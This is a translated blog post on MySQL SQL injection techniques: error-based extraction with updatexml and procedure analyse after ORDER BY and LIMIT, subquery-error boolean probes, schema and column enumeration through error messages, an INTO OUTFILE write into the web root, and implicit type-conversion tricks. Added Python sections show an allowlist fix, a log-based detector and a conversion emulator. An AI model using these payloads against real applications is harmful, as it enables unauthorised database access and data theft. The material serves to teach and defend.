Original link: http://wyb0.com/posts/some-tips-for-sql-injection/
Environment: MySQL 5.5.47
0x00 Injection point after ORDER BY
mysql> select id,name,content from msg where id>1 order by id into outfile 'C:\\Apps\\phpStudy\\WWW\\a.txt';
Query OK, 1 row affected (0.01 sec)
mysql> select id,name,content from msg where id>1 order by updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~msg~'
mysql> select id,name,content from msg where id>1 order by name procedure analyse(updatexml(1,concat(0x7e,database(),0x7e),1),1);
ERROR 1105 (HY000): XPATH syntax error: '~rtest~'
mysql> select name from msg where id>1 order by if(1=1,1,(select 1 union select 2));
+----------+
| name |
+----------+
| xiaohong |
+----------+
1 row in set (0.00 sec)
mysql> select name from msg where id>1 order by if(1=2,1,(select 1 union select 2));
ERROR 1242 (21000): Subquery returns more than 1 row
mysql> select name from msg where id>1 order by (select case when(2>1) then 1 else 1*(select 1 union select 2)end)=1;
+----------+
| name |
+----------+
| xiaohong |
+----------+
1 row in set (0.00 sec)
mysql> select name from msg where id>1 order by (select case when(2<1) then 1 else 1*(select 1 union select 2)end)=1;
ERROR 1242 (21000): Subquery returns more than 1 row
0x01 Injection point after LIMIT
- If there is no ORDER BY before the LIMIT, union and analyse() can be used
mysql> select id,name,content from msg where id>1 limit 1,1 union select 1,2,3;
+----+------+---------+
| id | name | content |
+----+------+---------+
| 1 | 2 | 3 |
+----+------+---------+
1 row in set (0.01 sec)
mysql> select id,name,content from msg where id>1 limit 1,1 procedure analyse();
+-------------------+---------------+---------------+------------+------------+
| Field_name | Min_value | Max_value | Min_length | Max_length |
+-------------------+---------------+---------------+------------+------------+
| rtest.msg.name | xiaohong | xiaohong | 8 | 8 |
| rtest.msg.content | I have a cat. | I have a cat. | 13 | 13 |
+-------------------+---------------+---------------+------------+------------+
------------------+-------+-------------------------+------+--------------------+
Empties_or_zeros | Nulls | Avg_value_or_avg_length | Std | Optimal_fieldtype |
------------------+-------+-------------------------+------+--------------------+
0 | 0 | 8.0000 | NULL | ENUM('xiaohong') NOT NULL |
0 | 0 | 13.0000 | NULL | ENUM('I have a cat.') NOT NULL|
------------------+-------+-------------------------+------+--------------------+
2 rows in set (0.00 sec)
- If there is an ORDER BY before the LIMIT, union and analyse() cannot be used
mysql> select id,name,content from msg where id>1 limit 1,1 procedure analyse(updatexml(1,concat(0x7e,@@version,0x7e),1),1);
ERROR 1105 (HY000): XPATH syntax error: '~5.5.47~'
mysql> select id,name,content from msg where id>1 order by name limit 1,1 procedure analyse(updatexml(1,concat(0x7e,@@version,0x7e),1),1);
ERROR 1105 (HY000): XPATH syntax error: '~5.5.47~'
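The defensive counterpart to 0x00 and 0x01, added here as an example in Python (it is not code from the original post). Neither an ORDER BY column nor, in many drivers, a LIMIT clause can simply be interpolated from request input, which is why the payloads above reach the parser. The usual fix is an allowlist for the sort column and direction plus integer coercion and range checks for the LIMIT values, which are then bound as parameters. The `msg` columns come from `desc msg` on this page; the allowlist set, `MAX_PAGE_SIZE`, the request parameter names and the `%s` placeholder style (Python DB-API MySQL drivers) are assumptions.

```python
# Constructed allowlist: the only columns a request may sort on. The column
# names are those of the msg table shown on the page; the choice of exposing
# exactly these three is an assumption of this example.
SORTABLE_COLUMNS = {"id", "name", "content"}
MAX_PAGE_SIZE = 100  # assumed upper bound for one page of results


class UnsafeInputError(ValueError):
    """Raised when a sort or limit parameter is not in the permitted form."""


def build_query(sort, direction, offset, count):
    """Return (sql, params) for a sorted, paginated query on msg.

    The sort column and direction are checked against fixed allowlists and
    only then written into the SQL text; the LIMIT values are coerced to
    bounded integers and passed as bound parameters (%s placeholders in the
    DB-API style used by Python MySQL drivers), so no request string is ever
    spliced into the statement.
    """
    if sort not in SORTABLE_COLUMNS:
        raise UnsafeInputError(f"sort column not allowed: {sort!r}")
    direction = str(direction).upper()
    if direction not in ("ASC", "DESC"):
        raise UnsafeInputError(f"sort direction not allowed: {direction!r}")
    try:
        offset_i = int(offset)
        count_i = int(count)
    except (TypeError, ValueError):
        # int() rejects anything that is not a plain integer literal, e.g.
        # "1,1 union select 1,2,3" or "1 procedure analyse()".
        raise UnsafeInputError("limit values must be integers") from None
    if offset_i < 0 or not 1 <= count_i <= MAX_PAGE_SIZE:
        raise UnsafeInputError("limit values out of range")
    sql = ("SELECT id,name,content FROM msg WHERE id>1 "
           f"ORDER BY `{sort}` {direction} LIMIT %s,%s")
    return sql, (offset_i, count_i)


def is_rejected(sort, direction, offset, count):
    """True when build_query refuses the given request parameters."""
    try:
        build_query(sort, direction, offset, count)
    except UnsafeInputError:
        return True
    return False


if __name__ == "__main__":
    print(build_query("name", "asc", "1", "1"))
    # The ORDER BY and LIMIT payloads quoted on this page never reach MySQL:
    print(is_rejected("if(1=1,1,(select 1 union select 2))", "asc", 0, 10))
    print(is_rejected("name", "asc", "1,1 union select 1,2,3", 1))
    print(is_rejected("name", "asc", 1, "1 procedure analyse()"))
```

The important property is that `sort` and `direction` are compared against fixed sets rather than escaped: escaping does not help inside ORDER BY, because the injected text is an expression, not a string literal.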
0x02 Obtaining the database name, table name and column names from error messages
# The database name is rtest
mysql> select id,name,content from msg where id=2-a();
ERROR 1305 (42000): FUNCTION rtest.a does not exist
# The table name is msg
mysql> select id,name,content from msg where id=2 and polygon(1);
ERROR 1367 (22007): Illegal non geometric '1' value found during parsing
mysql> select id,name,content from msg where id=2 and polygon(id);
ERROR 1367 (22007): Illegal non geometric '`rtest`.`msg`.`id`' value found during parsing
# The column names are id, name, content and useragent
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b)c);
ERROR 1060 (42S21): Duplicate column name 'id'
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id))c);
ERROR 1060 (42S21): Duplicate column name 'name'
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id,name))c);
ERROR 1060 (42S21): Duplicate column name 'content'
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id,name,content))c);
ERROR 1060 (42S21): Duplicate column name 'useragent'
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id,name,content,useragent))c);
ERROR 1241 (21000): Operand should contain 1 column(s)
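Every probe in 0x00 through 0x02 only works because the raw MySQL error text is returned to the client, so the same texts are a cheap detection signal on the defender's side. The Python below is an added example, not code from the original post: it scans an application log in which the web tier records the database error it received, matches the error codes quoted on this page, pulls out any `~...~` fragment that an XPath error leaked, and escalates clients that triggered several distinct probe types. The log format, the `db_error=` field, the client addresses and the timestamps are constructed assumptions; the error messages are the ones shown above.

```python
import re

# Constructed sample log (assumed format): timestamp, client, method, path,
# then db_error=- or db_error=<MySQL error as the driver reported it>.
# The error texts are those quoted on this page; addresses are RFC 5737 ranges.
SAMPLE_LOG = """\
2016-03-01T10:00:01Z 203.0.113.5 GET /msg?id=2 db_error=-
2016-03-01T10:00:04Z 203.0.113.5 GET /msg?id=2 db_error=ERROR 1305 (42000): FUNCTION rtest.a does not exist
2016-03-01T10:00:06Z 203.0.113.5 GET /msg?id=2 db_error=ERROR 1367 (22007): Illegal non geometric '`rtest`.`msg`.`id`' value found during parsing
2016-03-01T10:00:09Z 203.0.113.5 GET /msg?id=2 db_error=ERROR 1060 (42S21): Duplicate column name 'useragent'
2016-03-01T10:00:12Z 203.0.113.5 GET /msg?id=2 db_error=ERROR 1105 (HY000): XPATH syntax error: '~rtest~'
2016-03-01T10:00:15Z 198.51.100.9 GET /msg?id=3 db_error=-
2016-03-01T10:00:20Z 198.51.100.9 GET /msg?id=3 db_error=ERROR 1242 (21000): Subquery returns more than 1 row
"""

# MySQL error codes seen on this page, each tagged with the probe that
# typically produces it when it shows up in response to user-controlled input.
ERROR_TAGS = {
    1105: "XPath error-based extraction (updatexml/extractvalue)",
    1305: "undefined-function probe (error text carries the schema name)",
    1367: "geometry-function probe (error text carries table/column names)",
    1060: "self-join probe (error text enumerates column names)",
    1242: "subquery cardinality probe (boolean inference)",
}

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<path>\S+) "
    r"db_error=ERROR (?P<code>\d+) \((?P<state>[0-9A-Z]+)\): (?P<msg>.*)$"
)
# The 0x7e delimiters used in the page's updatexml payloads become '~' in
# the error text; whatever sits between them is what the attacker read.
LEAK_RE = re.compile(r"'~(?P<leak>[^~]*)~'")


def scan(log_text):
    """Return one finding per request whose recorded DB error is a known probe."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # no DB error recorded, or a line in another format
        code = int(m.group("code"))
        if code not in ERROR_TAGS:
            continue
        leak = LEAK_RE.search(m.group("msg"))
        findings.append({
            "ts": m.group("ts"),
            "client": m.group("client"),
            "code": code,
            "tag": ERROR_TAGS[code],
            "leaked": leak.group("leak") if leak else None,
        })
    return findings


def triage(findings, threshold=3):
    """Clients that triggered at least `threshold` distinct probe types."""
    per_client = {}
    for f in findings:
        per_client.setdefault(f["client"], set()).add(f["code"])
    return {client for client, codes in per_client.items() if len(codes) >= threshold}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f["ts"], f["client"], f["code"], f["tag"], "leaked:", f["leaked"])
    print("clients to escalate:", triage(found))
```

A single 1242 from one client is the kind of thing a buggy query can produce on its own, which is why `triage` counts distinct error codes per client rather than raw hits; the durable fix is still to stop returning database error text to the browser at all, since the scanner only sees what the application chose to log.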
0x03 Implicit type conversion in MySQL
- Official implicit conversion rules:
- If one or both arguments are NULL, the result of the comparison is NULL, except for the NULL-safe <=> operator, which returns 1 when comparing two NULLs; neither case requires a type conversion
- If both arguments are strings, they are compared as strings, with no type conversion
- If both arguments are integers, they are compared as integers, with no type conversion
- A hexadecimal value is treated as a binary string when compared with a non-number
- If one argument is TIMESTAMP or DATETIME and the other is a constant, the constant is converted to a timestamp
- If one argument is of type decimal and the other is decimal or integer, the integer is converted to decimal before comparison; if the other argument is a floating-point number, the decimal is converted to floating point for the comparison
- In all other cases, both arguments are converted to floating-point numbers before comparison
- When a number and a string are used in arithmetic, both are converted to DOUBLE
mysql> select 2+'4'; # a number and a string are both converted to numbers
+-------+
| 2+'4' |
+-------+
| 6 |
+-------+
1 row in set (0.00 sec)
mysql> select 'a'+'55'; # two strings are both converted to numbers
+----------+
| 'a'+'55' |
+----------+
| 55 |
+----------+
1 row in set, 1 warning (0.00 sec)
mysql> select '33'+'32d11a';
+---------------+
| '33'+'32d11a' |
+---------------+
| 65 |
+---------------+
1 row in set, 1 warning (0.00 sec)
- concat() converts numbers to strings
mysql> select concat(3,'test'); # the leading number 3 is converted to a string
+------------------+
| concat(3,'test') |
+------------------+
| 3test |
+------------------+
1 row in set (0.00 sec)
- name is a string column, yet the integer condition 0 matches a row
mysql> desc msg;
+-----------+---------------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+-----------+---------------+------+-----+---------+----------------+
| id | int(11) | NO | PRI | NULL | auto_increment |
| name | varchar(30) | NO | | NULL | |
| content | varchar(1024) | NO | | NULL | |
| useragent | varchar(1024) | NO | | NULL | |
+-----------+---------------+------+-----+---------+----------------+
4 rows in set (0.01 sec)
mysql> select id,name,content from msg where id=1 and name=0;
+----+----------+--------------+
| id | name | content |
+----+----------+--------------+
| 1 | xiaoming | hello world. |
+----+----------+--------------+
1 row in set, 2 warnings (0.00 sec)
mysql> show warnings;
+---------+------+----------------------------------------------+
| Level | Code | Message |
+---------+------+----------------------------------------------+
| Warning | 1292 | Truncated incorrect DOUBLE value: 'xiaoming' |
+---------+------+----------------------------------------------+
2 rows in set (0.00 sec)
mysql> select id,name,content from msg;
+----+----------+---------------+
| id | name | content |
+----+----------+---------------+
| 1 | xiaoming | hello world. |
| 2 | xiaohong | I have a cat. |
| 3 | 55lihua | ni hao |
+----+----------+---------------+
3 rows in set (0.00 sec)
mysql> select id,name,content from msg where name='li'+'55';
+----+---------+---------+
| id | name | content |
+----+---------+---------+
| 3 | 55lihua | ni hao |
+----+---------+---------+
1 row in set, 4 warnings (0.01 sec)
mysql> show warnings;
+---------+------+----------------------------------------------+
| Level | Code | Message |
+---------+------+----------------------------------------------+
| Warning | 1292 | Truncated incorrect DOUBLE value: 'xiaoming' |
| Warning | 1292 | Truncated incorrect DOUBLE value: 'li' |
| Warning | 1292 | Truncated incorrect DOUBLE value: 'xiaohong' |
| Warning | 1292 | Truncated incorrect DOUBLE value: '55lihua' |
+---------+------+----------------------------------------------+
4 rows in set (0.00 sec)
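The conversions in 0x03 follow one mechanism: a string in numeric context becomes the DOUBLE spelled by its leading numeric prefix, the rest is dropped with a "Truncated incorrect DOUBLE value" warning, and a string with no numeric prefix becomes 0. The Python below, added here as an example and not part of the original post, emulates that rule and the three comparison cases that matter for the queries above (string vs string, number vs number, string vs number), then replays the page's own queries against the `msg` rows shown in `select id,name,content from msg`. The prefix regex and the warning bookkeeping are this example's approximation of MySQL's behaviour; the table contents come from the page.

```python
import re

# Leading numeric prefix that MySQL's string-to-DOUBLE conversion accepts:
# optional whitespace and sign, digits with an optional fraction, optional
# exponent. Whatever follows the prefix is ignored (with a warning).
_NUM_PREFIX = re.compile(r"^\s*([+-]?(?:\d+\.?\d*|\.\d+)(?:[eE][+-]?\d+)?)")

# The msg table as shown on the page (id, name, content).
MSG_ROWS = [
    (1, "xiaoming", "hello world."),
    (2, "xiaohong", "I have a cat."),
    (3, "55lihua", "ni hao"),
]


def str_to_double(value):
    """Emulate MySQL converting `value` to DOUBLE in a numeric context.

    Returns (number, warning). Numbers pass through unchanged; a string
    yields the value of its numeric prefix, or 0 if it has none, and a
    warning whenever any part of the string had to be discarded.
    """
    if isinstance(value, (int, float)):
        return float(value), None
    m = _NUM_PREFIX.match(value)
    warning = f"Truncated incorrect DOUBLE value: '{value}'"
    if m is None:
        return 0.0, warning
    if m.end() != len(value):
        return float(m.group(1)), warning
    return float(m.group(1)), None


def add(a, b):
    """MySQL `a + b`: both operands are converted to DOUBLE."""
    x, w1 = str_to_double(a)
    y, w2 = str_to_double(b)
    return x + y, [w for w in (w1, w2) if w]


def equals(a, b):
    """MySQL `a = b` for the cases on this page: string vs string compares
    as strings; anything involving a number compares as DOUBLE."""
    if isinstance(a, str) and isinstance(b, str):
        return a == b, []
    x, w1 = str_to_double(a)
    y, w2 = str_to_double(b)
    return x == y, [w for w in (w1, w2) if w]


def select_where_name_equals(rows, value):
    """Emulate `SELECT id FROM msg WHERE name = <value>` over `rows`,
    returning the matched ids and every warning the comparisons raised."""
    matched, warnings = [], []
    for row_id, name, _content in rows:
        ok, w = equals(name, value)
        warnings.extend(w)
        if ok:
            matched.append(row_id)
    return matched, warnings


if __name__ == "__main__":
    print(add(2, "4"))            # (6.0, [])
    print(add("a", "55"))         # (55.0, [one warning for 'a'])
    print(add("33", "32d11a"))    # (65.0, [one warning for '32d11a'])
    # name=0 matches every name without a numeric prefix, not just row 1
    print(select_where_name_equals(MSG_ROWS, 0))
    # name='li'+'55' becomes name=55, which '55lihua' satisfies
    total, w = add("li", "55")
    print(select_where_name_equals(MSG_ROWS, total), w)
```

The replay shows why the page's `name=0` and `name='li'+'55'` queries match: the moment one operand is numeric, every row's `name` is coerced to DOUBLE and compared as a number, and the warnings are the only trace of the lossy conversion. Comparing a string column against a typed string parameter (or casting explicitly) keeps the comparison in the string-vs-string rule, where no such collapse happens.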